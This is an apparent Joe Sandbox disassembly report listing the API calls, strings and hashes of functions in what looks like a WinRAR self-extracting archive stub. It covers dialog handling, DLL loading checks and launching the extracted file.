Function 0035B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0035B7E5

Part of subcall function 00341316: GetDlgItem.USER32(00000000,00003021), ref: 0034135A
Part of subcall function 00341316: SetWindowTextW.USER32(00000000,003735F4), ref: 00341370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0035B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035B8EF
IsDialogMessageW.USER32(?,?), ref: 0035B902
TranslateMessage.USER32(?), ref: 0035B910
DispatchMessageW.USER32(?), ref: 0035B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0035B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0035B960
GetDlgItem.USER32(?,00000068), ref: 0035B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0035B99E
SendMessageW.USER32(00000000,000000C2,00000000,003735F4), ref: 0035B9B1

Part of subcall function 0035D453: _wcschr.LIBVCRUNTIME ref: 0035D45C
Part of subcall function 0035D453: _wcslen.LIBCMT ref: 0035D47D

SetFocus.USER32(00000000), ref: 0035B9B8
_swprintf.LIBCMT ref: 0035BA24

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

Part of subcall function 0035D4D4: GetDlgItem.USER32(00000068,0039FCB8), ref: 0035D4E8
Part of subcall function 0035D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0035AF07,00000001,?,?,0035B7B9,0037506C,0039FCB8,0039FCB8,00001000,00000000,00000000), ref: 0035D510
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0035D51B
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003735F4), ref: 0035D529
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0035D53F
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0035D559
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0035D59D
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0035D5AB
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0035D5BA
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0035D5E1
Part of subcall function 0035D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003743F4), ref: 0035D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0035BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0035BA90
GetTickCount.KERNEL32 ref: 0035BAAE
_swprintf.LIBCMT ref: 0035BAC2
GetLastError.KERNEL32(?,00000011), ref: 0035BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0035BB43
_swprintf.LIBCMT ref: 0035BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0035BBD0
GetCommandLineW.KERNEL32 ref: 0035BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0035BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0035BC6F
Sleep.KERNEL32(00000064), ref: 0035BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0035BCE2
CloseHandle.KERNEL32(00000000), ref: 0035BCEB
_swprintf.LIBCMT ref: 0035BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0035BD7D
SetDlgItemTextW.USER32(?,00000065,003735F4), ref: 0035BD94
GetDlgItem.USER32(?,00000065), ref: 0035BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0035BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0035BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0035BE68
_wcslen.LIBCMT ref: 0035BEBE
_swprintf.LIBCMT ref: 0035BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0035BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0035BF4C
GetDlgItem.USER32(?,00000068), ref: 0035BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0035BF6B
GetDlgItem.USER32(?,00000066), ref: 0035BF85
SetWindowTextW.USER32(00000000,0038A472), ref: 0035BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0035C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0035C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0035C0BD
EnableWindow.USER32(00000000,00000000), ref: 0035C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0035C1D9

Part of subcall function 0035C73F: __EH_prolog.LIBCMT ref: 0035C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0035C1FD

Strings

^5, xrefs: 0035C1E1
PDu<5, xrefs: 0035BC6F
<, xrefs: 0035BB84
%s, xrefs: 0035BED8
C:\Users\user\Desktop, xrefs: 0035BBC9
LICENSEDLG, xrefs: 0035C0B2
@, xrefs: 0035BB91
-el -s2 "-d%s" "-sp%s", xrefs: 0035BB6B
h5, xrefs: 0035BCA5
STARTDLG, xrefs: 0035B801
__tmp_rar_sfx_access_check_%u, xrefs: 0035BAB5
winrarsfxmappingfile.tmp, xrefs: 0035BBA6
Q7, xrefs: 0035BBBC
"%s"%s, xrefs: 0035BD0D

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<5$STARTDLG$^5$__tmp_rar_sfx_access_check_%u$h5$winrarsfxmappingfile.tmp$Q7
API String ID: 3829768659-179532025
Opcode ID: 86726854845bbb133538b4069b7189d1d3b7f458244b16f7e581cadb91c689fc
Instruction ID: fa30f7ae44096a5bc4aa59f7b33420454cb496603b71d72ecb7521e80f35b317
Opcode Fuzzy Hash: 86726854845bbb133538b4069b7189d1d3b7f458244b16f7e581cadb91c689fc
Instruction Fuzzy Hash: 8742D771944344BEEB23AB709C4AFBEB7BCAB02705F054095F945AA1E2CB755E48CB21

Function 00350863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0035087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0035088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003508BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00350B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00350B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00350B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<7,00000000), ref: 00350BB1
CloseHandle.KERNEL32(00000000), ref: 00350C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00350C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<7,?,00000000,?,00000800), ref: 00350C72
GetFileAttributesW.KERNELBASE(?,?,|<7,00000800,?,00000000,?,00000800), ref: 00350C9C
GetFileAttributesW.KERNEL32(?,?,D=7,00000800), ref: 00350CD8

Part of subcall function 0035081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00350836
Part of subcall function 0035081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034F2D8,Crypt32.dll,00000000,0034F35C,?,?,0034F33E,?,?,?), ref: 00350858

_swprintf.LIBCMT ref: 00350D4A
_swprintf.LIBCMT ref: 00350D96

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

AllocConsole.KERNEL32 ref: 00350D9E
GetCurrentProcessId.KERNEL32 ref: 00350DA8
AttachConsole.KERNEL32(00000000), ref: 00350DAF
_wcslen.LIBCMT ref: 00350DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00350DD5
WriteConsoleW.KERNEL32(00000000), ref: 00350DDC
Sleep.KERNEL32(00002710), ref: 00350DE7
FreeConsole.KERNEL32 ref: 00350DED
ExitProcess.KERNEL32 ref: 00350DF5

Strings

h=7, xrefs: 00350947
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00350D84
T=7, xrefs: 0035093F
h>7, xrefs: 0035099F
HA7, xrefs: 00350ADA
D=7, xrefs: 00350CB9, 00350CC9
>7, xrefs: 003509C7
uxtheme.dll, xrefs: 00350D17
d?7, xrefs: 003509FE
<7, xrefs: 00350917
4B7, xrefs: 00350B3D
|?7, xrefs: 00350A09
0A7, xrefs: 00350ACF
|<7, xrefs: 00350B9E, 00350BA2
8>7, xrefs: 0035098F
kernel32, xrefs: 00350873
dwmapi.dll, xrefs: 00350927, 00350D0D
H?7, xrefs: 003509F3
H@7, xrefs: 00350A61
SetDllDirectoryW, xrefs: 00350888
DXGIDebug.dll, xrefs: 003508FC, 00350C5E
|@7, xrefs: 00350A77
`@7, xrefs: 00350A6C
?7, xrefs: 00350A35
,@7, xrefs: 00350A56
A7, xrefs: 00350B1C
,<7, xrefs: 003508E7
0?7, xrefs: 003509E8
@7, xrefs: 00350AAE
P>7, xrefs: 00350997
(=7, xrefs: 0035092F
SetDefaultDllDirectories, xrefs: 003508B9
dA7, xrefs: 00350AE5

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: (=7$,<7$,@7$0?7$0A7$4B7$8>7$D=7$DXGIDebug.dll$H?7$H@7$HA7$P>7$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=7$`@7$d?7$dA7$dwmapi.dll$h=7$h>7$kernel32$uxtheme.dll$|<7$|?7$|@7$<7$>7$?7$@7$A7
API String ID: 1207345701-3298810501
Opcode ID: 095330172e31cee842dbc3088573c74b03119bd16435e5af0e5f62903b084760
Instruction ID: 30924e2eaf3fab674158f7fd71ba15f9aec7a1e52d131420c10f124c53e00a5c
Opcode Fuzzy Hash: 095330172e31cee842dbc3088573c74b03119bd16435e5af0e5f62903b084760
Instruction Fuzzy Hash: 96D17DB5008384ABD3339F50C848F9FBAECBB85705F50891DF68D9A150CBB99648DB63

Function 0035C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0035C744

Part of subcall function 0035B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0035B3FB

Part of subcall function 0035AF98: _wcschr.LIBVCRUNTIME ref: 0035B033

_wcslen.LIBCMT ref: 0035CA0A
_wcslen.LIBCMT ref: 0035CA13
SetWindowTextW.USER32(?,?), ref: 0035CA71
_wcslen.LIBCMT ref: 0035CAB3
_wcsrchr.LIBVCRUNTIME ref: 0035CBFB
GetDlgItem.USER32(?,00000066), ref: 0035CC36
SetWindowTextW.USER32(00000000,?), ref: 0035CC46
SendMessageW.USER32(00000000,00000143,00000000,0038A472), ref: 0035CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0035CC7F

Strings

5, xrefs: 0035CB24
Software\Microsoft\Windows\CurrentVersion, xrefs: 0035CB1A
<br>, xrefs: 0035C9D4
ProgramFilesDir, xrefs: 0035CB45
%s.%d.tmp, xrefs: 0035C940
<5, xrefs: 0035C909

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$<5$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$5
API String ID: 986293930-2956897750
Opcode ID: 601687579c033659f16f8752f4dcad0187d6ac61a8bb0c8b3675d5d3d87b948c
Instruction ID: 31f4ec0aaa8f4cb9288ebd1d88699e052bd7327e212b12b31bcc7d8c923cb872
Opcode Fuzzy Hash: 601687579c033659f16f8752f4dcad0187d6ac61a8bb0c8b3675d5d3d87b948c
Instruction Fuzzy Hash: BCE16772900218AEDF26DBA0DD85DEE77BCAF05351F4180A6F909E7050EB749F888F60

Function 0034DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0034DA70
_wcschr.LIBVCRUNTIME ref: 0034DA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0034DAAC

Part of subcall function 0034C29A: _wcslen.LIBCMT ref: 0034C2A2

Part of subcall function 003505DA: _wcslen.LIBCMT ref: 003505E0

Part of subcall function 00351B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0034BAE9,00000000,?,?,?,00010466), ref: 00351BA0

_wcslen.LIBCMT ref: 0034DDE9
__fprintf_l.LIBCMT ref: 0034DF1C

Strings

*messages***, xrefs: 0034DBC1
97, xrefs: 0034DDD0
a, xrefs: 0034DC16
,, xrefs: 0034DF57
@%s:, xrefs: 0034DF06, 0034DF12
*messages***, xrefs: 0034DBFA
RTL, xrefs: 0034DEDE
R, xrefs: 0034DC0C
, xrefs: 0034DD6C
$%s:, xrefs: 0034DEFF

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$97
API String ID: 557298264-69519641
Opcode ID: 0aaf67ba3a9667137995f696adc5d64f23c108abeafa76752bc93678ea00edb3
Instruction ID: 1740613e2795be5d0c8a9912b024a6816199b070d8d2350f5712e0ffda6c6520
Opcode Fuzzy Hash: 0aaf67ba3a9667137995f696adc5d64f23c108abeafa76752bc93678ea00edb3
Instruction Fuzzy Hash: 3132C072900218ABCF26EF68C842BEA77E9FF15700F41455AF9059F291EBB1AD85CB50

Function 0035D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035B579
Part of subcall function 0035B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035B58A
Part of subcall function 0035B568: IsDialogMessageW.USER32(00010466,?), ref: 0035B59E
Part of subcall function 0035B568: TranslateMessage.USER32(?), ref: 0035B5AC
Part of subcall function 0035B568: DispatchMessageW.USER32(?), ref: 0035B5B6

GetDlgItem.USER32(00000068,0039FCB8), ref: 0035D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0035AF07,00000001,?,?,0035B7B9,0037506C,0039FCB8,0039FCB8,00001000,00000000,00000000), ref: 0035D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0035D51B
SendMessageW.USER32(00000000,000000C2,00000000,003735F4), ref: 0035D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0035D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0035D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0035D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0035D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0035D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0035D5E1
SendMessageW.USER32(00000000,000000C2,00000000,003743F4), ref: 0035D5F0

Strings

\, xrefs: 0035D549

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: a419b9b8bc68a8bf61166f0a30005f1ac6da86afaf8ce4171879553ae7477943
Instruction ID: 687c85cbe43a25dd82136702b186d18561602c25474f6ffa1012561bb3f38800
Opcode Fuzzy Hash: a419b9b8bc68a8bf61166f0a30005f1ac6da86afaf8ce4171879553ae7477943
Instruction Fuzzy Hash: 7D31B171145342AFE312DF20DC4AFAB7FACEB87715F010908F952961A1EB659A0887B6

Function 0035D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0035D7AE
ShellExecuteExW.SHELL32(?), ref: 0035D8DE
ShowWindow.USER32(?,00000000), ref: 0035D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0035D959
CloseHandle.KERNEL32(?), ref: 0035D97F
ShowWindow.USER32(?,00000001), ref: 0035D9E1

Strings

h5, xrefs: 0035D92E
PDu<5, xrefs: 0035D8DE
.inf, xrefs: 0035D89A
r5, xrefs: 0035D911
.exe, xrefs: 0035D989

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf$PDu<5$h5$r5
API String ID: 36480843-4123355210
Opcode ID: 494827d094933ee73b8a229fe3d1698929ca78863e3c9480c517f8a29eb7a300
Instruction ID: c81f96e5291c1f4a34e2467837ad93a414299d8ef0de276af13618213407310a
Opcode Fuzzy Hash: 494827d094933ee73b8a229fe3d1698929ca78863e3c9480c517f8a29eb7a300
Instruction Fuzzy Hash: 4051D4705043809AEB339B249845FABBBE8AF42746F06481EFDC5971B1E771898CCB52

Function 0036A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00365695,00365695,?,?,?,0036ABAC,00000001,00000001,2DE85006), ref: 0036A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0036ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0036AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0036AB35
__freea.LIBCMT ref: 0036AB42

Part of subcall function 00368E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036CA2C,00000000,?,00366CBE,?,00000008,?,003691E0,?,?,?), ref: 00368E38

__freea.LIBCMT ref: 0036AB4B
__freea.LIBCMT ref: 0036AB70

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4face744d9bad00fe714f090bf0a7ed2a7166e0372564ae98208440a79422c45
Instruction ID: dea5e4a872a7930a000af6d9350a9a2934c2a3dc1bf19991948248c513aa6509
Opcode Fuzzy Hash: 4face744d9bad00fe714f090bf0a7ed2a7166e0372564ae98208440a79422c45
Instruction Fuzzy Hash: 3151D872600616AFDB274F64CC41EBFB7AAEB44710F168629FC04EB148DB34DC50DAA2

Function 00363B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00363C35,?,?,003A2088,00000000,?,00363D60,00000004,InitializeCriticalSectionEx,00376394,InitializeCriticalSectionEx,00000000), ref: 00363C03

Strings

api-ms-, xrefs: 00363BC3

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: e51215ed994e2244a0f4ea7a943853fe7ae71072aa289b1b3f8fa5a815c31cc7
Instruction ID: 1012e195e60aaffb2a7b42ad7e2f65728cc6d3de3b949e25b625f5901506c125
Opcode Fuzzy Hash: e51215ed994e2244a0f4ea7a943853fe7ae71072aa289b1b3f8fa5a815c31cc7
Instruction Fuzzy Hash: A111CA31A45625ABCB338B589C4579D3768DF017B0F168110F915FB298E771EF409AD1

Function 0035AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00350836
Part of subcall function 0035081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034F2D8,Crypt32.dll,00000000,0034F35C,?,?,0034F33E,?,?,?), ref: 00350858

OleInitialize.OLE32(00000000), ref: 0035AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0035AC66
SHGetMalloc.SHELL32(00388438), ref: 0035AC70

Strings

3Oo, xrefs: 0035AC47
riched20.dll, xrefs: 0035AC1E

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Oo
API String ID: 3498096277-671628130
Opcode ID: 601180b24545a8218c72031b8a96f8df15550bf09e02910e9fe549101f9d5c11
Instruction ID: 9eb00fe6d792d59be25adaba9b7ba86616b9be1715a6639075c4152bd4b7072f
Opcode Fuzzy Hash: 601180b24545a8218c72031b8a96f8df15550bf09e02910e9fe549101f9d5c11
Instruction Fuzzy Hash: 8FF0F9B1900249ABCB11AFA9D849DEFFBFCEF85701F00415AE815A2251DBB456058FA1

Function 003498E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00347760,?,00000005,?,00000011), ref: 0034995F
GetLastError.KERNEL32(?,?,00347760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0034996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00347760,?,00000005,?), ref: 003499A2
GetLastError.KERNEL32(?,?,00347760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003499AA
